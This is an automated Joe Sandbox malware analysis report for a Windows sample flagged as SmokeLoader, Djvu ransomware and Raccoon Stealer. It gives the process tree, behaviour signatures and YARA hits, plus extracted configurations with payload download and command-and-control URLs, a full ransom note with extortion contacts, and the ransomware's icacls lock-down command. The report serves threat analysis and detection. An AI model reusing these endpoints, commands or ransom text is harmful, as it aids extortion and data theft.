Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800784
MD5:17a74a0281cefb5d9c29022fbc79981a
SHA1:d88585c6c9488b6d28b71dd0659edb8649e32dca
SHA256:2814b2a02771e2d16ce2efb1586d8623b54b50d6e1c8dfa9ab2bbf54ab8b249d
Tags:exeRecordBreaker
Infos:

Detection

Djvu, Fabookie, Raccoon Stealer v2, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Detected VMProtect packer
Tries to steal Crypto Currency Wallets
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Connects to several IPs in different countries

Classification

  • System is w10x64
  • file.exe (PID: 4356 cmdline: C:\Users\user\Desktop\file.exe MD5: 17A74A0281CEFB5D9C29022FBC79981A)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 4113.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\4113.exe MD5: B141BC58618C537917CC1DA179CBE8AB)
      • 3046.exe (PID: 3680 cmdline: C:\Users\user\AppData\Local\Temp\3046.exe MD5: 46909DA148DE57B2D85591626AEDBD76)
        • 3046.exe (PID: 5672 cmdline: C:\Users\user\AppData\Local\Temp\3046.exe MD5: 46909DA148DE57B2D85591626AEDBD76)
          • icacls.exe (PID: 3460 cmdline: icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
          • 3046.exe (PID: 5256 cmdline: "C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask MD5: 46909DA148DE57B2D85591626AEDBD76)
      • A33B.exe (PID: 3776 cmdline: C:\Users\user\AppData\Local\Temp\A33B.exe MD5: B328ABE938AE81E9382BD6858A6EE77F)
        • llpb1133.exe (PID: 2560 cmdline: "C:\Users\user\AppData\Local\Temp\llpb1133.exe" MD5: 81A0ECC23B44DA5116D397C0A3104A05)
        • pliu.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Local\Temp\pliu.exe" MD5: B9363486500E209C05F97330226BBF8A)
          • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • pliu.exe (PID: 5180 cmdline: "C:\Users\user\AppData\Local\Temp\pliu.exe" -h MD5: B9363486500E209C05F97330226BBF8A)
            • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • XandETC.exe (PID: 5632 cmdline: "C:\Users\user\AppData\Local\Temp\XandETC.exe" MD5: 3006B49F3A30A80BB85074C279ACC7DF)
      • 98D7.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\98D7.exe MD5: 81A0ECC23B44DA5116D397C0A3104A05)
      • E4.exe (PID: 2096 cmdline: C:\Users\user\AppData\Local\Temp\E4.exe MD5: 29C3DE14DFFA53EDC7E690D0FC0ECCE2)
      • ECFB.exe (PID: 996 cmdline: C:\Users\user\AppData\Local\Temp\ECFB.exe MD5: 3A452937E8A961C5E19974C2CBB4AFAA)
        • WerFault.exe (PID: 4116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • D8D3.exe (PID: 5128 cmdline: C:\Users\user\AppData\Local\Temp\D8D3.exe MD5: 0CA939E14D58B13997144F0AF89ADEA9)
      • 3046.exe (PID: 3112 cmdline: "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart MD5: 46909DA148DE57B2D85591626AEDBD76)
      • 3046.exe (PID: 4084 cmdline: "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart MD5: 46909DA148DE57B2D85591626AEDBD76)
  • sievwvt (PID: 3176 cmdline: C:\Users\user\AppData\Roaming\sievwvt MD5: 17A74A0281CEFB5D9C29022FBC79981A)
  • 3046.exe (PID: 4424 cmdline: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task MD5: 46909DA148DE57B2D85591626AEDBD76)
  • cleanup
{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-8pCGyFnOj6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0641JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApKaxnIXI+dNswr3BwHaz\\\\n2d48dsnCgVqNaCi3raCQH9vXnap8L2JxiWeoQF+T2OGE+ecKJpaifomH2NUPid9n\\\\n1YbThm64VJFv\\/QkGa3aGDfcOQJP+wnHTaJNGHnh\\/1JyhqlfJDJ\\/FZvINl4VJFyWS\\\\nJd\\/zSb4vp8WmkqCTPgQ5nH8fy1kL9c1Z8BQVhqzuCeiJVFn4QjIt7ct\\/vsQXfhOg\\\\nkmRpwR3oJ40fghjpkqxS+wreCfNIHPXHq8Ope0eOfQ9vXQQ2sapKLhE97+NJ0os0\\\\n4JoAS5yjNOCUk8aDxFTDbWCtnutApBuv93hFaMpbOlVDbBmBl+ZCXwyfyx8cMEzm\\\\npQIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\A33B.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
    • 0x75be97:$s1: Runner
    • 0x75bffc:$s3: RunOnStartup
    • 0x75beab:$a1: Antis
    • 0x75bed8:$a2: antiVM
    • 0x75bedf:$a3: antiSandbox
    • 0x75beeb:$a4: antiDebug
    • 0x75bef5:$a5: antiEmulator
    • 0x75bf02:$a6: enablePersistence
    • 0x75bf14:$a7: enableFakeError
    • 0x75c025:$a8: DetectVirtualMachine
    • 0x75c04a:$a9: DetectSandboxie
    • 0x75c075:$a10: DetectDebugger
    • 0x75c084:$a11: CheckEmulator
    SourceRuleDescriptionAuthorStrings
    00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x59db:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x6012:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 49 entries
        SourceRuleDescriptionAuthorStrings
        15.2.3046.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth (Nextron Systems)
        • 0xe0dea:$s1: http://
        • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
        • 0xe0dea:$f1: http://
        15.2.3046.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          15.2.3046.exe.400000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
          • 0xfe888:$x1: C:\SystemID\PersonalID.txt
          • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
          • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
          • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
          • 0xfecec:$s1: " --AutoStart
          • 0xfed00:$s1: " --AutoStart
          • 0x102948:$s2: --ForNetRes
          • 0x102910:$s3: --Admin
          • 0x102d90:$s4: %username%
          • 0x102eb4:$s5: ?pid=
          • 0x102ec0:$s6: &first=true
          • 0x102ed8:$s6: &first=false
          • 0xfedf4:$s7: delself.bat
          • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
          • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          15.2.3046.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          33.2.3046.exe.23515a0.1.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth (Nextron Systems)
          • 0xe0dea:$s1: http://
          • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
          • 0xe0dea:$f1: http://
          Click to see the 36 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://xv.yxzgamen.com/2701.htmlURL Reputation: Label: malware
          Source: https://xv.yxzgamen.com/logo.pngURL Reputation: Label: malware
          Source: http://77.73.134.27/llpb1133.exeURL Reputation: Label: malware
          Source: http://bihsy.com/lancer/get.phpAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeAvira: detection malicious, Label: HEUR/AGEN.1210601
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeAvira: detection malicious, Label: HEUR/AGEN.1210601
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeAvira: detection malicious, Label: HEUR/AGEN.1234960
          Source: file.exeReversingLabs: Detection: 48%
          Source: file.exeVirustotal: Detection: 34%Perma Link
          Source: potunulit.orgVirustotal: Detection: 16%Perma Link
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\3046.exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\4113.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeReversingLabs: Detection: 56%
          Source: C:\Users\user\AppData\Local\Temp\XandETC.exeReversingLabs: Detection: 91%
          Source: C:\Users\user\AppData\Local\Temp\db.dllReversingLabs: Detection: 42%
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeReversingLabs: Detection: 84%
          Source: C:\Users\user\AppData\Roaming\sievwvtReversingLabs: Detection: 48%
          Source: file.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\12C0.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\FB61.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\sievwvtJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\3046.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\E4.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\jhevwvtJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\4113.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeJoe Sandbox ML: detected
          Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-8pCGyFnOj6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0641JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Window
          Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

          Compliance

          barindex
          Source: C:\Users\user\AppData\Local\Temp\4113.exeUnpacked PE file: 11.2.4113.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\3046.exeUnpacked PE file: 15.2.3046.exe.400000.0.unpack
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2
          Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00428390 FindFirstFileExW,11_2_00428390

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 37.34.248.24 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: perficut.at
          Source: C:\Windows\explorer.exeDomain query: potunulit.org
          Source: C:\Windows\explorer.exeNetwork Connect: 190.219.54.242 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.106.124.133 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 195.158.3.162 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 158.69.96.67 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 77.73.134.27 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: flytourchip.com.br
          Source: Malware configuration extractorURLs: http://bihsy.com/lancer/get.php
          Source: Malware configuration extractorURLs: http://bulimu55t.net/
          Source: Malware configuration extractorURLs: http://soryytlic4.net/
          Source: Malware configuration extractorURLs: http://bukubuka1.net/
          Source: Malware configuration extractorURLs: http://novanosa5org.org/
          Source: Malware configuration extractorURLs: http://hujukui3.net/
          Source: Malware configuration extractorURLs: http://newzelannd66.org/
          Source: Malware configuration extractorURLs: http://golilopaster.org/
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
